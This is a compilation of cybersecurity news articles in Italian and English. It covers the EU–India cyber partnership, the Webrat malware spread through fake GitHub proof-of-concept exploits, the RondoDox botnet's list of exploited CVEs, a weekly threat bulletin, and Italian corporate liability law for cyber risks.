più securitaria e sovranista, guidata da minacce regionali e dalla necessità di rafforzare capacità interne e autonomia tecnologica. Oltre che nella governance, questa asimmetria emerge anche sul piano commerciale. Per Bruxelles la cybersicurezza è anche regolazione del Mercato Unico. Un’architettura che quindi poggia su diversi strumenti, dal NIS2 (Direttiva (UE) 2022/2555) e gli obblighi di gestione del rischio e reporting per le organizzazioni al Cyber Resiliance Act (EU 2024/2847) passando per gli schemi di certificazione europei (ad esempio l’EUCC attivo dal 2025). Per l’India, invece, questa è contemporaneamente sicurezza e leva industriale, collegata alla crescita dell’IT e alla proiezione internazionale dei servizi digitali. L’importanza del contrasto al cybercrime Il punto di incontro, però, è pragmatico: ORF indica come aree promettenti l’intensificazione sul contrasto al cybercrime (forense, condivisione di informazioni) e sulla cyber hygiene (igiene informatica) che raggruppa le pratiche di base e continuative per mantenere sistemi, le reti e le organizzazioni in sicurezza, dove le differenze ideologiche pesano meno e conta la riduzione del rischio reale. D’altronde, il recente Global Cybersecuirty Outlook 2026, redatto dal World Economic Forum (WEC), racconta di un acuirsi della minaccia cyber, in grado di esporre in maniera sempre più evidente le debolezze e le fragilità del quadro geopolitico internazionale che appare oggi frammentato. In particolare, grazie al ruolo di acceleratore giocato dall’IA la cui evoluzione ha influenzato pesantemente le capacità offensive in tale dominio. Se letto sotto questa lente, l’accordo tra Unione europea e India può effettivamente rappresentare un caso studio virtuoso, che mira a fare fronte comune e a favorire un’azione collettiva e coordinata di risposta a queste minacce. I capisaldi della partnership La partnership fissa infatti alcuni capisaldi, a partire dal rafforzamento del Cyber Dialogue bilaterale che comprenderà, oltre allo scambio regolare di valutazione del panorama delle minacce, confronto sui quadri normativi e sviluppo di forme di cooperazione pratica, incluse attività di capacity building e condivisione di best practice. Viene inoltre predisposto il coordinamento nelle risposte diplomatiche nei confronti di attività cyber avverse, un tassello particolarmente significativo e che va incontro alle indicazioni del WEC sulla necessità di maggior collaborazione tra nazioni e agenzie di sicurezza. Un ulteriore pilastro riguarda l’allineamento sul quadro delle Nazioni Unite relativo al responsible state behaviour in cyberspace, che definisce le norme di comportamento volontarie per prevenire conflitti e aumentare la sicurezza nel dominio digitale; in questo si legge chiaramente il tentativo di ridurre il costo della frammentazione normativa globale attraverso un minimo comune denominatore di regole condivise. Centrale è anche la cooperazione su resilienza e protezione delle infrastrutture critiche, con la creazione di un framework che promuove lo scambio di approcci su gestione del rischio sistemico, dipendenze da fornitori esterni e sicurezza delle supply chain. Infine, la partnership include un coordinamento su AI ed Emerging & Disruptive Technologies, con particolare attenzione alla governance e all’uso responsabile. Il valore geopolitico dell’intesa Geopoliticamente, l’intesa UE–India va quindi letta come un investimento anti-fragilità in un ordine internazionale più instabile: non è un’alleanza militare, ma una architettura di convergenza su domini dove economia e sicurezza coincidono (digitale, supply chain, infrastrutture critiche). Da questo punto di vista, appare assolutamente in linea la volontà dell’accordo di collocare il dominio cyber accanto, ad esempio, a quello marittimo e dell’antiterrorismo, normalizzando l’idea che la competizione nel cyberspazio sia parte della sicurezza strategica. In sintesi, Unione europea e India stanno tendando di elevare la propria relazione da mera somma di esperienze commerciali a cooperazione strategica, incorporando quello cyber come un vero e proprio linguaggio comune.
cybersecitalia.itFeb 17, 2026extracted
Budding infosec pros and aspiring cyber crooks targeted with fake PoC exploits
Budding infosec pros and aspiring cyber crooks targeted with fake PoC exploits Malware peddlers are targeting infosec enthusiasts, budding security professionals, and aspiring hackers with the Webrat malware, masquerading the threat as proof-of-concept (PoC) exploits for known vulnerabilities. Delivering the malware The recently uncovered Webrat can steal data from Telegram, Discord and Steam accounts and cryptocurrency wallets. It’s also capable of logging keystrokes, recording the computer screen, taking over the machine’s webcam and microphone, and acting as a backdoor through which the attackers can control the system. The malware is packaged into a password-protected archive that’s offered for download on GitHub, via repositories that ostensibly host PoC exploits for vulnerabilities with high CVSSv3 scores. The text in the malicious GitHub repositories was likely machine-generated, and the Download Exploit ZIP link in the Download & Install section leads to a password-protected archive hosted in the same repository. The AI-generated content of the repositories (Source: Kaspersky) Among the files in the archive file is an executable that escalates its privileges to the administrator level, disables Windows Defender, and fetches Webrat from from a hardcoded URL. PoC exploits as lures In this Webrat delivery campaign, which began in September 2025 and was discovered by Kaspersky researchers a month later, the attackers have leveraged vulnerabilities frequently mentioned in security advisories and industry news: CVE-2025-10294 (a vulnerability in the OwnID Passwordless Login plugin for WordPress) CVE-2025-59295 (a heap-based buffer overflow in Internet Explorer) CVE-2025-59230 (an elevation of privilege vulnerability in Windows RasMan) CVE-2025-12595 and CVE-2025-12596 (vulnerabilities in the Tenda AC23 wireless router) CVE-2025-54897 (a Microsoft SharePoint remote code execution vulnerability) CVE-2025-54106 (a vulnerability in Windows Routing and Remote Access Service (RRAS) CVE-2025-55234 (an EoP flaw in Windows SMB server) CVE-2025-11499 (an unauthenticated arbitrary file upload vulnerability affecting the Tablesome Table WordPress plugin) CVE-2025-11833 (a flaw in the Post SMTP WordPress plugin) “This is not the first time threat actors have tried to lure security researchers with exploits. Last year, they similarly took advantage of the high-profile RegreSSHion vulnerability, which lacked a working PoC at the time,” Kaspersky researchers noted. Late last year, DataDog researchers discovered a threat actor targeting security researchers and offensive actors by setting up dozens of malicious GitHub repositories with fake or trojanized PoC exploit code. In 2023, someone tried to push the VenomRat malware onto anyone who might be interested in a PoC exploit for a WinRAR remote code execution vulnerability. While Kaspersky researchers suggest the campaign primarily targets budding security professionals, it may also be intended to compromise systems used by criminals attempting to integrate newly disclosed vulnerabilities into their own operations. “This serves as a reminder that cybersecurity professionals, especially inexperienced researchers and students, must remain vigilant when handling exploits and any potentially malicious files. To prevent potential damage to work and personal devices containing sensitive information, we recommend analyzing these exploits and files within isolated environments like virtual machines or sandboxes,” Kaspersky researchers advised. Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!
helpnetsecurity.comDec 23, 2025extracted
ThreatsDay Bulletin: AI Tools in Malware, Botnets, GDI Flaws, Election Attacks & More
Cybercrime has stopped being a problem of just the internet — it’s becoming a problem of the real world. Online scams now fund organized crime, hackers rent violence like a service, and even trusted apps or social platforms are turning into attack vectors. The result is a global system where every digital weakness can be turned into physical harm, economic loss, or political leverage. Understanding these links is no longer optional — it’s survival. For a full look at the most important security news stories of the week, keep reading. Hidden flaws resurface in Windows coreDetails have emerged about three now-patched security vulnerabilities in Windows Graphics Device Interface (GDI) that could enable remote code execution and information disclosure. These issues – CVE-2025-30388, CVE-2025-53766, and CVE-2025-47984 – involve out-of-bounds memory access triggered through malformed enhanced metafile (EMF) and EMF+ records that can cause memory corruption during image rendering. They are rooted in gdiplus.dll and gdi32full.dll, which process vector graphics, text, and print operations. They were addressed by Microsoft in the Patch Tuesday updates in May, July, and August 2025 in gdiplus.dll versions 10.0.26100.3037 through 10.0.26100.4946 and gdi32full.dll version 10.0.26100.4652. "Security vulnerabilities can persist undetected for years, often resurfacing due to incomplete fixes," Check Point said. "A particular information disclosure vulnerability, despite being formally addressed with a security patch, remained active for years due to the original issue receiving only a partial fix. This example underscores a basic conundrum for researchers: introducing a vulnerability is often easy, fixing it can be difficult, and verifying that a fix is both thorough and effective is even more challenging." Syndicate staffed by fake workers net millionsThree Chinese nationals, Yan Peijian, 39, Huang Qinzheng, 37, and Liu Yuqi, 33, were convicted and sentenced to a little over two years in prison in Singapore for their involvement in hacking into overseas gambling websites and companies for the purposes of cheating during gameplay and stealing databases of personally identifiable information for trade. The three individuals, part of a group of five Chinese nationals and one Singaporean man, were originally arrested and charged in September 2024. "The three accused persons were tasked by the syndicate's group leader to probe sites of interest for system vulnerabilities, conduct penetration attacks, and exfiltrate personal information from the compromised systems," the Singapore Police Force said. "Further investigations revealed that the syndicate possessed foreign government data, including confidential communications." The three defendants were also found to be in possession of tools like PlugX and "hundreds of different remote access trojans" to conduct cyber attacks. According to Channel News Asia, the three men entered the country on fake work permits in 2022 and worked for a 38-year-old Ni-Vanuatu citizen named Xu Liangbiao. They were paid about $3 million for their work. Xu, the alleged leader, is said to have left Singapore in August 2023. His present whereabouts are unknown. AI speeds triage but human skill still neededCheck Point has demonstrated a way by which ChatGPT can be used for malware analysis and flip the balance when it comes to taking apart sophisticated trojans like XLoader, which is designed such that its code decrypts only at runtime and is protected by multiple layers of encryption. Specifically, the research found that cloud-based static analysis with ChatGPT can be combined with Model Context Protocol (MCP) for runtime key extraction and live debugging validation. "The use of AI doesn't eliminate the need for human expertise," security researcher Alexey Bukhteyev said. "XLoader's most sophisticated protections, such as scattered key derivation logic and multi-layer function encryption, still require manual analysis and targeted adjustments. But the heavy lifting of triage, deobfuscation, and scripting can now be accelerated dramatically. What once took days can now be compressed into hours." RondoDox goes from DVRs to enterprise-wide weaponThe malware known as RondoDox has witnessed a 650% increase in exploitation vectors, expanding from niche DVR targeting to enterprise. This includes more than 15 new exploitation vectors targeting LB-LINK, Oracle WebLogic Server, PHPUnit, D-Link, NETGEAR, Linksys, Tenda, TP-Link devices, as well as a new command-and-control (C2) infrastructure on compromised residential IP. Once dropped, the malware proceeds to eliminate competition by killing existing malware such as XMRig and other botnets, disabling SELinux and AppArmor, and running the main payload that's compatible with the system architecture. DHS pushes sweeping biometric rule for immigrationThe U.S. Department of Homeland Security (DHS) has proposed an amendment to existing regulations governing the use and collection of biometric information. The agency has put forth requirements for a "robust system for biometrics collection, storage, and use related to adjudicating immigration benefits and other requests and performing other functions necessary for administering and enforcing immigration and naturalization laws." As part of the plan, any individual filing or associated with a benefit request or other request or collection of information, including U.S. citizens, U.S. nationals, and lawful permanent residents, must submit biometrics, regardless of their age, unless DHS otherwise exempts the requirement. The agency said using biometrics for identity verification and management will assist DHS's efforts to combat trafficking, confirm the results of biographical criminal history checks, and deter fraud. The DHS is taking comments on the proposal until January 2, 2026. Researchers uncover large-scale AWS abuse networkCybersecurity researchers have discovered a new large-scale attack infrastructure dubbed TruffleNet that's built around the open-source tool TruffleHog, which is used to systematically test compromised credentials and perform reconnaissance across Amazon Web Services' (AWS) environments. "In one incident involving multiple compromised credentials, we recorded activity from more than 800 unique hosts across 57 distinct Class C networks," Fortinet said. "This infrastructure was characterized by the use of TruffleHog, a popular open-source secret-scanning tool, and by consistent configurations, including open ports and the presence of Portainer," an open-source management UI for Docker and Kubernetes that simplifies container deployment and orchestration. In these activities, the threat actors make calls to the GetCallerIdentity and GetSendQuota APIs to test whether the credentials are valid and abuse the Simple Email Service (SES). While no follow-on actions were observed by Fortinet, it's assessed that the attacks originate from a possibly tiered infrastructure, with some nodes dedicated to reconnaissance and others reserved for later stages of the attack. Also observed alongside the TruffleNet reconnaissance activity is the abuse of SES for Business Email Compromise (BEC) attacks. It's currently not known if these are directly connected to each other. The development comes as Fortinet revealed that financially motivated adversaries are targeting a broad range of sectors but relying on the same low-complexity, high-return methods, typically gaining initial access through compromised credentials, external remote services like VPNs, and exploitation of public-facing applications. These attacks are often characterized by the use of legitimate remote access tools for secondary persistence and leveraging them for data exfiltration to their infrastructure. FIN7 deploys stealthy SSH backdoor for persistencePRODAFT has revealed that the financially motivated threat actor known as FIN7 (aka Savage Ladybug) has deployed since 2022 a "Windows specific SSH-based backdoor by packaging a self-contained OpenSSH toolset and an installer named install.bat." The backdoor provides attackers with persistent remote access and reliable file exfiltration using an outbound reverse SSH tunnel and SFTP. Cloudflare fends off massive DDoS surge on election dayWeb infrastructure company Cloudflare said Moldova's Central Election Commission (CEC) experienced significant cyber attacks in the days leading to the country's Parliament election on September 28. The CEC also witnessed a "series of concentrated, high-volume (DDoS) attacks strategically timed throughout the day" on the day of the elections. Attacks also targeted other election-related, civil society, and news websites. "These attack patterns mirrored those against the election authority, suggesting a coordinated effort to disrupt both official election processes and the public information channels voters rely on," it said, adding it mitigated over 898 million malicious requests directed at the CEC over a 12-hour period between 09:06:00 UTC and 21:34:00 UTC. Silent Lynx exploits diplomacy themes to breach targetsThe threat actor tracked as Silent Lynx (aka Cavalry Werewolf, Comrade Saiga, ShadowSilk, SturgeonPhisher, and Tomiris) has been observed targeting government entities, diplomatic missions, mining firms, and transportation companies. In one campaign, the adversary singled out organizations involved in Azerbaijan-Russian diplomacy, using phishing lures related to the CIS summit held in Dushanbe around mid-October 2025 to deliver the open-source Ligolo-ng reverse shell and a loader called Silent Loader that's responsible for running a PowerShell script to connect to a remote server. Also deployed is a C++ implant named Laplas that's designed to connect to an external server and receive additional commands for execution via "cmd.exe." Another payload of note is SilentSweeper, a .NET backdoor that extracts and runs a PowerShell Script that acts as a reverse shell. The second campaign, on the other hand, aimed at China-Central Asia relations to distribute a RAR archive that led to the deployment of SilentSweeper. The activity has been codenamed Operation Peek-a-Baku by Seqrite Labs. Doctor Web, in an independent analysis, said it investigated a phishing attack mounted by the threat actor targeting a government-owned organization within the Russian Federation to deliver reverse shell backdoors with the goal of collecting confidential information as well as network configuration data. Cyber gangs blend digital and physical extortion across EuropeEuropean organizations witnessed a 13% increase in ransomware over the past year, with entities in the U.K., Germany, Italy, France, and Spain most affected. A review of data leak sites over the period September 2024–August 2025 has revealed that the number of European victims has increased annually to 1,380. The most targeted sectors were manufacturing, professional services, technology, industrials, engineering, and retail. Since January 2024, over 2,100 victims across Europe have been named on extortion leak sites, with 92% involving file encryption and data theft. Akira (167), LockBit (162), RansomHub (141), INC, Lynx, and Sinobi were the most successful ransomware groups over the period. CrowdStrike said it's also seeing a surge in violence-as-a-service offerings across the continent with the goal of securing big payouts, including physical cryptocurrency theft. Cybercriminals connected to The Com, a loose-knit collective of young, English-speaking hackers, and a Russia-affiliated group called Renaissance Spider have coordinated physical attacks, kidnapping, and arson through Telegram-based networks. Renaissance Spider, which has been active since October 2017, is also said to have emailed fake bomb threats to European entities, likely aiming to undermine support for Ukraine. There have been 17 of these kinds of attacks since January 2024, out of which 13 took place in France. Fake ChatGPT and WhatsApp apps exploit user trustCybersecurity researchers have discovered apps that use the branding of established services like OpenAI's ChatGPT and DALL-E, and WhatsApp. While the fake DALL-E Android app ("com.openai.dalle3umagic") is used for ad traffic generation, the ChatGPT wrapper app connects to legitimate OpenAI APIs while identifying itself as an "unofficial interface" for the artificial intelligence chatbot. Although not outright malicious, impersonation without transparency can expose users to unintended security risks. The counterfeit WhatsApp app, named WhatsApp Plus, masquerades as an upgraded version of the messaging platform, but contains stealthy payloads that can harvest contacts, SMS messages, and call logs. "The flood of cloned applications reflects a deeper problem: brand trust has become a vector for exploitation," Appknox said. "As AI and messaging tools dominate the digital landscape, bad actors are learning that mimicking credibility is often more profitable than building new malware from scratch." Phishers weaponize trusted email accounts post-breachThreat actors are continuing to launch phishing campaigns after their initial compromise by leveraging compromised internal email accounts to expand their reach both within the compromised organization as well as externally to partner entities. "The follow-on phishing campaigns were primarily oriented towards credential harvesting," Cisco Talos said. "Looking forward, as defenses against phishing attacks improve, adversaries are seeking ways to enhance these emails’ legitimacy, likely leading to the increased use of compromised accounts post-exploitation." Asia-wide phishing surge uses multilingual luresRecent phishing campaigns across East and Southeast Asia have been found to leverage multilingual ZIP file lures and shared web templates to target government and financial organizations. "These operations are characterized by multilingual web templates, region-specific incentives, and adaptive payload delivery mechanisms, demonstrating a clear shift toward scalable and automation-driven infrastructure," Hunt.io said. "From China and Taiwan to Japan and Southeast Asia, the adversaries have continuously repurposed templates, filenames, and hosting patterns to sustain their operations while evading conventional detection. The strong overlap in domain structures, webpage titles, and scripting logic indicates a shared toolkit or centralized builder designed to automate payload delivery at scale. This investigation links multiple clusters to a unified phishing toolkit used across Asia." Remote kill-switch fears spark probe into Chinese busesAuthorities in Denmark have launched an investigation following a discovery that electric buses manufactured by the Chinese company Yutong had remote access to the vehicles' control systems and allowed them to be remotely deactivated. This has raised security concerns that the loophole could be exploited to affect buses while in transit. "The testing revealed risks that we are now taking measures against," Bernt Reitan Jenssen, chief executive of the Norwegian public transport authority Ruter, was quoted as saying. "National and local authorities have been informed and must assist with additional measures at a national level." Cloudflare scrubs botnet domains from global rankingsCloudflare has scrubbed domains associated with the massive AISURU botnet from its top domain rankings. According to security journalist Brian Krebs, AISURU's operators are using the botnet to boost their malicious domain rankings, while simultaneously targeting the company's domain name system (DNS) service. China delivers harsh verdict in cross-border scam crackdownA court in China has sentenced five members of a Myanmar crime syndicate to death for their roles in running industrial-scale scamming compounds near the border with China. The death sentences were handed out to the syndicate boss Bai Suocheng and his son Bai Yingcang, as well as Yang Liqiang, Hu Xiaojiang, and Chen Guangyi. Five others were sentenced to life. In all, 21 members and associates of the syndicate were convicted of fraud, homicide, injury, and other crimes. According to Xinhua, the defendants ran 41 industrial parks to facilitate telecommunications and online fraud at scale. The harsh penalty is the latest in a series of actions governments across the world have taken to combat the rise of cyber-enabled scam centers in Southeast Asia, where thousands are trafficked under the pretext of well-paying jobs, and are trapped, abused, and forced to defraud others in criminal operations worth billions. In September 2025, 11 members of the Ming crime family arrested during a 2023 cross-border crackdown were sentenced to death. Massive global credit card scam busted in €300M stingA coordinated law enforcement operation against a massive credit card fraud scheme dubbed Chargeback has led to the arrest of 18 suspects. The arrested individuals are German, Lithuanian, Dutch, Austrian, Danish, American, and Canadian nationals. "The alleged perpetrators are suspected of setting up an intricate scheme of fake online subscriptions to dating, pornography, and streaming services, among others, which were paid for by credit card," Eurojust said. "Among those arrested are five executive officials from four German payment service providers. The perpetrators deliberately kept monthly credit card payments to their accounts below the maximum of EUR 50 to avoid arousing suspicion among victims about high transfer amounts." The illicit scam is estimated to have defrauded at least €300 million from over 4.3 million credit card users with 19 million accounts in 193 countries between 2016 and 2021. The total value of attempted fraud against card users amounts to more than €750 million. Europol said the suspects used numerous shell companies, primarily registered in the U.K. and Cyprus, to conceal their activities. Every hack or scam has one thing in common — someone takes advantage of trust. As security teams improve their defenses, attackers quickly find new tricks. The best way to stay ahead isn’t to panic, but to stay informed, keep learning, and stay alert. Cybersecurity keeps changing fast — and our understanding needs to keep up.
thehackernews.comNov 6, 2025extracted
Researchers Warn RondoDox Botnet is Weaponizing Over 50 Flaws Across 30+ Vendors
Malware campaigns distributing the RondoDox botnet have expanded their targeting focus to exploit more than 50 vulnerabilities across over 30 vendors. The activity, described as akin to an "exploit shotgun" approach, has singled out a wide range of internet-exposed infrastructure, including routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and various other network devices, according to Trend Micro. The cybersecurity company said it detected a RondoDox intrusion attempt on June 15, 2025, when the attackers exploited CVE-2023-1389, a security flaw in TP-Link Archer routers that has come under active exploitation repeatedly since it was first disclosed in late 2022. RondoDox was first documented by Fortinet FortiGuard Labs back in July 2025, detailing attacks aimed at TBK digital video recorders (DVRs) and Four-Faith routers to enlist them in a botnet for carrying out distributed denial-of-service (DDoS) attacks against specific targets using HTTP, UDP, and TCP protocols. "More recently, RondoDox broadened its distribution by using a 'loader-as-a-service' infrastructure that co-packages RondoDox with Mirai/Morte payloads – making detection and remediation more urgent," Trend Micro said. RondoDox's expanded arsenal of exploits includes nearly five dozen security flaws, out of which 18 don't have a CVE identifier assigned. The 56 vulnerabilities span various vendors such as D-Link, TVT, LILIN, Fiberhome, Linksys, BYTEVALUE, ASMAX, Brickcom, IQrouter, Ricon, Nexxt, NETGEAR, Apache, TBK, TOTOLINK, Meteobridge, Digiever, Edimax, QNAP, GNU, Dasan, Tenda, LB-LINK, AVTECH, Zyxel, Hytec Inter, Belkin, Billion, and Cisco. "The latest RondoDox botnet campaign represents a significant evolution in automated network exploitation," the company added. "It's a clear signal that the campaign is evolving beyond single-device opportunism into a multivector loader operation." Late last month, CloudSEK revealed details of a large-scale loader-as-a-service botnet distributing RondoDox, Mirai, and Morte payloads through SOHO routers, Internet of Things (IoT) devices, and enterprise apps by weaponizing weak credentials, unsanitized inputs, and old CVEs. The development comes as security journalist Brian Krebs noted that the DDoS botnet known as AISURU is "drawing a majority of its firepower" from compromised IoT devices hosted on U.S. internet providers like AT&T, Comcast, and Verizon. One of the botnet's operators, Forky, is alleged to be based in Sao Paulo, Brazil, and is also linked to a DDoS mitigation service called Botshield. In recent months, AISURU has emerged as one of the largest and most disruptive botnets, responsible for some of the record-setting DDoS attacks seen to date. Built on the foundations of Mirai, the botnet controls an estimated 300,000 compromised hosts worldwide. The findings also follow the discovery of a coordinated botnet operation involving over 100,000 unique IP addresses from no less than 100 countries targeting Remote Desktop Protocol (RDP) services in the U.S., per GreyNoise. The activity is said to have commenced on October 8, 2025, with the majority of the traffic originating from Brazil, Argentina, Iran, China, Mexico, Russia, South Africa, Ecuador, and others. "The campaign employs two specific attack vectors – RD Web Access timing attacks and RDP web client login enumeration – with most participating IPs sharing one similar TCP fingerprint, indicating centralized control," the threat intelligence firm said.
thehackernews.comOct 13, 2025extracted
RondoDox botnet targets 56 n-day flaws in worldwide attacks
A new large-scale botnet called RondoDox is targeting 56 vulnerabilities in more than 30 distinct devices, including flaws first disclosed during Pwn2Own hacking competitions. The attacker focuses on a wide range of exposed devices, including DVRs, NVRs, CCTV systems, and web servers and have been active since June. The RondoDox botnet leverages what Trend Micro researchers call an “exploit shotgun” strategy, where numerous exploits are used simultaneously to maximize the infections, even if the activity is very noisy. Since FortiGuard Labs discovered RondoDox, the botnet appears to have expanded the list of exploited vulnerabilities, which included CVE-2024-3721 and CVE-2024-12856. Mass n-day exploitation In a report today, Trend Micro says that RondoDox exploits CVE-2023-1389, a flaw in the TP-Link Archer AX21 Wi-Fi router that was originally demonstrated at Pwn2Own Toronto 2022. Pwn2Own is a hacking competition organized twice a year by Trend Micro's Zero Day Initiative (ZDI), where white-hat teams demonstrate exploits for zero-day vulnerabilities in widely used products. The security researchers note that the botnet developer pay close attention to exploits demonstrated during Pwn2Own events, and move quickly to weaponize them, as Mirai did with CVE-2023-1389 in 2023. Below is a list of post-2023 n-day flaws RondoDox includes in its arsenal: Digiever – CVE-2023-52163 QNAP – CVE-2023-47565 LB-LINK – CVE-2023-26801 TRENDnet – CVE-2023-51833 D-Link – CVE-2024-10914 TBK – CVE-2024-3721 Four-Faith – CVE-2024-12856 Netgear – CVE-2024-12847 AVTECH – CVE-2024-7029 TOTOLINK – CVE-2024-1781 Tenda – CVE-2025-7414 TOTOLINK – CVE-2025-1829 Meteobridge – CVE-2025-4008 Edimax – CVE-2025-22905 Linksys – CVE-2025-34037 TOTOLINK – CVE-2025-5504 TP-Link – CVE-2023-1389 Older flaws, especially in devices that reached end of life, are a significant risk as they are more likely to remain unpatched. More recent ones in supported hardware are equally dangerous since many users tend to ignore firmware updates after setting up the devices. Trend Micro also found that RondoDox incorporates exploits for 18 command injection flaws that have not been assigned a vulnerability ID (CVE). They impact D-Link NAS units, TVT and LILIN DVRs, Fiberhome, ASMAX, and Linksys routers, Brickcom cameras, and other unidentified endpoints. To protect against RondoDox and other botnet attacks, apply the latest available firmware updates for your device and replace EoL equipment. It is also recommended to segment your network to isolate critical data from internet-facing IoTs, or from guest connections, and replace default credentials with secure passwords. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comOct 9, 2025extracted
Colpa di organizzazione: come la cyber security ridefinisce i fondamenti della responsabilità 231
La storica sentenza delle Sezioni unite n. 38343/2014 ha codificato il principio della colpa di organizzazione come fondamento della responsabilità amministrativa degli enti prevista dal D.Lgs.231/2001. Dieci anni dopo, l’esplosione dei reati informatici e l’evoluzione tecnologica mettono alla prova questo paradigma giurisprudenziale, richiedendo una reinterpretazione che tenga conto delle specificità del mondo digitale. L’applicazione dei principi consolidati in ambito safety ai nuovi rischi cyber rivela analogie profonde ma anche differenze sostanziali che impongono un ripensamento teorico e operativo. Questo primo contributo di una esalogia dedicata al tema analizza i fondamenti giuridici della responsabilità 231 in ambito cyber security, gettando le basi per comprendere la rivoluzione normativa in atto e le sue implicazioni pratiche. Indice degli argomenti Era il 24 settembre 2014 quando le Sezioni Unite della Cassazione, con la sentenza n. 38343, scrivevano una pagina definitiva nella storia del diritto penale dell’impresa italiana. In quella decisione, la Suprema Corte codificava per sempre il concetto di “colpa di organizzazione”, trasformando quello che fino ad allora era un dibattito dottrinale in un principio di diritto consolidato. Più di dieci anni dopo, mentre celebriamo la maturità di quel principio, ci troviamo di fronte a una sfida inedita: l’applicazione di quei consolidati canoni interpretativi a un mondo – quello della cyber security – che all’epoca esisteva in forma embrionale e che oggi rappresenta la frontiera più avanzata e rischiosa dell’attività d’impresa. Questo mio contributo inaugura una serie di sei articoli dedicata all’analisi dell’impatto della cyber security sul sistema della responsabilità amministrativa degli enti. Questo primo articolo si concentra sui fondamenti teorici e giuridici, analizzando come i principi consolidati della “colpa di organizzazione” si adattino e si trasformino quando si prova ad applicarli al nuovo universo dei rischi digitali. La responsabilità “amministrativa” degli enti è regolata dall’art. 5 del D.Lgs. 231/2001. L’organizzazione può essere chiamata a rispondere per un reato commesso da un proprio dirigente o subordinato se: il reato è stato commesso “nell’interesse o a vantaggio” dell’ente; l’ente non ha adottato o applicato efficacemente un modello organizzativo idoneo a prevenirlo. Attenzione: “vantaggio” non significa utile in bilancio. Può bastare un semplice risparmio. La Cassazione lo ha chiarito con forza: se l’azienda taglia sulle misure di prevenzione per risparmiare quel risparmio diventa un vantaggio illecito (Cass., Sez. III, 30 maggio 2022, n. 21034). La regola è questa: o l’impresa ha adottato un modello organizzativo serio, efficace, concreto, oppure ne risponde. E oggi quel modello non può più ignorare la cybersicurezza. Vediamo in dettaglio il motivo. Prima della storica pronuncia del 2014, il panorama interpretativo del D.Lgs. 231/2001 si presentava come un mosaico frammentario di orientamenti giurisprudenziali spesso contraddittori. La questione centrale – se la responsabilità dell’ente fosse oggettiva o soggettiva – divideva dottrina e giurisprudenza, creando incertezza applicativa e forse, talvolta anche disparità di trattamento. Alcuni orientamenti propendevano per una lettura sostanzialmente oggettiva: commesso il reato da parte del soggetto apicale o subordinato, la responsabilità dell’ente scattava automaticamente, salvo la dimostrazione dell’efficacia del modello organizzativo. Altri, invece, sostenevano la necessità di un elemento soggettivo di colpevolezza dell’ente, ancorato alle sue scelte organizzative. La storica sentenza delle Sezioni Unite n. 38343 del 18 settembre 2014 ha definitivamente chiarito che la responsabilità amministrativa degli enti ex D.Lgs. 231/2001 costituisce un “tertium genus” che coniuga elementi dell’ordinamento penale e amministrativo, configurando un modello di responsabilità autonomo. In particolare, le Sezioni Unite hanno stabilito che la responsabilità dell’ente non è mai automatica ma si fonda su quello che la dottrina e la stessa giurisprudenza successiva hanno definito “colpa di organizzazione”. Secondo la formulazione della Cassazione, questa colpa è basata: “sul rimprovero derivante dall’inottemperanza da parte dell’ente dell’obbligo di adottare le cautele, organizzative e gestionali, necessarie a prevenire la commissione dei reati previsti tra quelli idonei a fondare la responsabilità del soggetto collettivo, dovendo tali accorgimenti essere consacrati in un documento che individua i rischi e delinea le misure atti a contrastarli”. Poi, la giurisprudenza consolidatasi dopo la sentenza del 2014 ha identificato che la “colpa di organizzazione” si manifesta attraverso: la dimensione dell’adozione del modello che comprende: la mancata adozione di modelli organizzativi idonei a prevenire i reati; l’inidoneità dei modelli adottati rispetto ai rischi specifici dell’attività svolta; carenze strutturali nei sistemi di controllo progettati. la dimensione dell’attuazione del modello che si manifesta attraverso: una inefficace attuazione dei modelli organizzativi adottati; una carente vigilanza sui processi a rischio identificati; una mancata implementazione di meccanismi correttivi in presenza di segnali di allarme. La Cassazione ha chiarito un punto fondamentale: non basta dimostrare che l’azienda non aveva un buon sistema di controllo o che non lo applicava correttamente. Questo da solo non è sufficiente per condannarla. Quello che conta davvero è dimostrare che l’azienda ha una sua “colpa specifica” nel modo in cui si è organizzata – una colpa che è completamente diversa da quella della persona che ha commesso materialmente il reato. Ecco cosa significa in pratica: primo: se un dipendente commette un reato, l’azienda non viene automaticamente punita. Bisogna prima dimostrare che l’organizzazione aziendale aveva dei difetti specifici; secondo: non si può condannare l’azienda solo perché il singolo dipendente ha sbagliato. Serve una prova separata che dimostri gli errori organizzativi dell’azienda stessa; terzo: ogni caso va valutato singolarmente, guardando ai rischi concreti di quella specifica attività e a come l’azienda avrebbe dovuto organizzarsi per gestirli. Quindi, il sistema 231 è unico nel suo genere, questo tipo di responsabilità è qualcosa di completamente nuovo nel diritto italiano. Non è responsabilità penale classica (perché l’azienda non è una persona), ma nemmeno responsabilità amministrativa tradizionale (perché si basa sulla colpa, non sul danno automatico). È quello che i giuristi chiamano un “tertium genus” – una terza via che rispetta i principi costituzionali ma crea regole specifiche per le organizzazioni aziendali. Quando si parla di “colpa di organizzazione” in ambito cyber, il pensiero corre subito a un altro settore dove questo concetto si è già radicato: la sicurezza sul lavoro. I reati previsti dall’art. 25-septies del D.Lgs. 231/2001, legati a salute e sicurezza dei lavoratori, condividono con i reati informatici – previsti dall’art. 24 bis dello stesso provvedimento normativo – una serie di caratteristiche. Entrambe le tipologie di reato infatti: richiedono competenze tecniche specifiche; si fondano su obblighi di prevenzione; si inseriscono dentro strutture organizzative complesse; devono misurarsi con un contesto in continua evoluzione. Ora, non è una forzatura, ma un passaggio logico e necessario guardare a quello schema concettuale come base di partenza per affrontare le nuove responsabilità legate agli incidenti cyber. Eppure, per quanto la struttura dei principi possa ricordarla, la partita si gioca oggi su un campo completamente diverso, molto più insidioso e imprevedibile. I reati informatici contemplati dall’art. 24-bis del D.Lgs. 231/2001 – accesso abusivo a sistemi informatici, danneggiamento, detenzione e diffusione abusiva di codici di accesso, e altri illeciti contro la riservatezza, l’integrità e la disponibilità dei dati – hanno una natura profondamente diversa rispetto ai reati previsti dall’art. 25 septies per l’ambito safety. Non si manifestano all’interno dell’organizzazione, ma arrivano da fuori, attraversando confini geografici, giuridici e tecnologici senza ostacoli. La minaccia può partire da un singolo individuo isolato, ma anche da gruppi criminali organizzati, da reti internazionali o addirittura da entità statali o para-statali. Non esistono barriere 